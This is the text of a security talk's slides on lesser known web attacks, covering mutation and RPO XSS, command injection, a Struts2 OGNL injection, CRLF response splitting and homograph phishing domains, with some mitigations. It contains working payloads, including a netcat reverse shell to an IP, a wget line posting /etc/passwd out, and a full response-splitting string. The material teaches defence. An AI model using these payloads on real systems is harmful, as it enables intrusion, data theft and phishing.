Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang

LesserKnownAttacks

Webapp

By Ninad Sarang

Lesser Known WebAppAttacks

About me Consultant at Aujas Networks

Part time bug hunter

Individual Security researcher

Blogger

http://infinite8security.blogspot.in


Menu Card

Cross site scripting –

Mutation XSS

RPO XSS

Zombie XSS

Remote Command Execution

CR-LF Attack

Homograph Attack

It’s all about PoPuP


Cross site Scripting-Mutation XSS


HTML encoded payload

<listing><img src=1 onerror=alert(1)></listing>

we will put this piece of code into another code using innerHTML

property.

<listing id=x><img src=1 onerror=alert(1)></listing>

<script>alert(document.getElementById('x').innerHTML)</script>

When this code will execute, browser will read innerHTML and call

document.getElementById(‘x’)

Resulting in multiple level of decoding and mutate from safe to

unsafe state.


Mitigation:

Server-side mitigation

• Avoiding outputting server content otherwise

incorrectly converted by the browser.

• The flawed content should be replaced with

semantically equivalent content which is converted

properly by the browser.

Client-side mitigation

• Browsers should implement ECMA Script 5 and higher.

• TrueHTML: TrueHTML relies on the XMLSerializer DOM

object provided by all of the user agents.

• https://cure53.de/fp170.pdf

https://cure53.de/fp170.pdf


Cross site Scripting-RPO XSS

Relative path Overwrite xss

• Difference between Absolute and Relative url

• Absolute URL: https://thehacker.co.in/test

• Relative URL: test/some_subdirectory

To exploit this findings three things are necessary,

1) stored XSS that allows CSS injection.

2) URL Rewriting.

3) Relative addressing to CSS style sheet.


DEMO

• Step 1: Lets visit

www.webdevelopersnotes.com/graphics/index.php3

• To check URL re-writing add ‘/’

• Open re-writed url with xss payloadin IE

and see the Magic ;)

• http://challenge.hackvertor.co.uk/

xss_horror_show/chapter7/rpo.php/

Mitigation:• It is recommended that absolute URLs should be used

throughout a site.

• Otherwise relative root url should be used.


Cross site Scripting-Zombie XSS


Cross site Scripting- Zombie XSS

www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash

Remote/OS Command Execution



Now what if ( ; ) is blocked by the application?

X ; Y = Seperating Commands (Run X and

then Y, regardless of success of X)

X | Y = PIPE (Run X and pass output of X to Y)

X ^ Y = PIPEZ

X && Y = AND (Run Y if X succeeded )

FAIL || Y = OR (Run Y if X failed)

X %0D Y %0D Z = OR

` X ` = Backtick

` X & Y ` = Background (Run Y and then run X in

background, regardless of success of X)

$( command )

nc -e /bin/sh = Netcat

wget --post-file /etc/passwd = WGET


RCE never dies!!!

• "action:", "redirect:" or "redirectAction:" is not

properly sanitized.

• information will be evaluated as OGNL (Object-Graph

Navigation Language) expression against the value stack,

this introduces the possibility to inject server side code.

Apache struts2 RCE

http://host/struts2-

blank/example/X.action?action:${3*4}


DEMO


Divide and Conquer cR-LF Attack

• CR stands for Carriage Return (CR, ASCII 13, \r)

• LF stands for Line feed (LF, ASCII 10, \n)

How this Attack work?

The server script embeds user data in HTTP response headers.

Example: Step1: There is redirection page “redir_lang.jsp”

When we hit index page server responds with following response

<% response.sendRedirect("/by_lang.jsp?lang="+

request.getParameter("lang")); %>


Divide and Conquer cR-LF Attack


Lets Attack ;)

Step 3: Instead of passing value as English. Lets pass our attack

vector as shown.

/redir_lang.jsp?lang=foobar%0d%0aContentLength

:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCont

entType:%20text/html%0d%0aContentLength:%2019%

0d%0a%0d%0a<html>Shazam</html>

Note: We have URL encoded the CRLF sequences

Lets see what server responds with


A first HTTP response, which

is a 302 (redirection)

response.

A second HTTP response, which is a 200 response, with a content comprising

of 19 bytes of HTML.

Superfluous data

So when the attacker feeds the target with two requests, the first

being to the URL/redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d%

0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aCont

entLength:%2019%0d%0a%0d%0a<html>Shazam</html>

And the second to the URL > /index.html

The target would believe that the first request is matched to the

first response:

And the second request (to /index.html) is matched to the second

response:


What Attacker can do by

CRLF attack?

Cross site scripting >>

http://blog.innerht.ml/twitter-crlf-injection

Web Cache Poisoning (defacement)

Cross User attacks (single user, single page, temporary

defacement)

Hijacking pages with user-specific information

Browser cache poisoning


http://blog.innerht.ml/twitter-crlf-injection/


Homograph Attack

Can you tell the difference?

1) https://ebаy.com/

2) https://ebay.com/


https://ebаy.com/

https://ebay.com/


What is this all about?http://ebаy.com/

Decoding to punycode

http://xn--eby-7cd.com/

Cyrillic alphabets


What Attacker can do by

Homograph attack?

Phishing

Un-validated Redirection

Fake websites

Attacker may combine this with SSL attacks

http://www.blackhat.com/presentations/bh-dc-

09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

Mitigation


Before After

Thank You

Reach me @

LinkedIn: Ninad Sarang

Twitter: @hbkninad

https://in.linkedin.com/in/ninad-sarang-ecsa-v8-ceh-v8-18119353

Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang

Technology

Transcript of Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang